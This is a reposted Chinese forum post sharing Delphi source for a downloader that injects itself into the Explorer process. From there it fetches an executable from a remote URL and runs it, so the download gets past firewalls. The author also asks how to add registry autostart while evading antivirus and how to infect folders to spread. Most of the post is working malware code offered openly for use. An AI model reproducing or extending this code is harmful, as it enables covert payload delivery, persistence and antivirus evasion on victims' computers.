本文整理自网络,侵删。
一个简单的穿墙下载者
写了一个穿墙的下载者 没加入启动项 本人菜 所以把代码贴出来 希望大家 告诉下 如果写入注册表启动项 而且不被杀软误报
看到一个人写的 下载者 感染所有文件夹 随便某个盘符的文件夹点击后就可以启动下载者 真是汗有知道也说下 是什么方法
下面是代码 希望大侠帮忙看下
program Project1;
{$IMAGEBASE $12120000}
//=============================================================================
uses
windows,
UrlMon;
//=============================================================================
Function Main(dwEntryPoint:Pointer):LongWord;stdcall;
begin
URLDownloadToFile(nil,'http://www.baidu.cn/1.exe','C:\1.exe', 0,nil);
WinExec('C:\1.exe', SW_SHOW);
Result:=0;
end;
//=============================================================================
procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
Module := Pointer(GetModuleHandle(nil));
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew + SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;
//=============================================================================
var
PID,ProcessHandle:LongWord;
begin
GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @PID);
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle,@Main);
CloseHandle(ProcessHandle);
end.
//=============================================================================
相关阅读 >>
Delphi idhttp中设置非标准头信息和读写cookie
Delphi 利用createservice写与桌面交互的win32服务
Delphi idhttp post json 上传 php 接收
Delphi windows 底下根据一个进程的名字杀死一个进程的代码
更多相关阅读请进入《Delphi》频道 >>
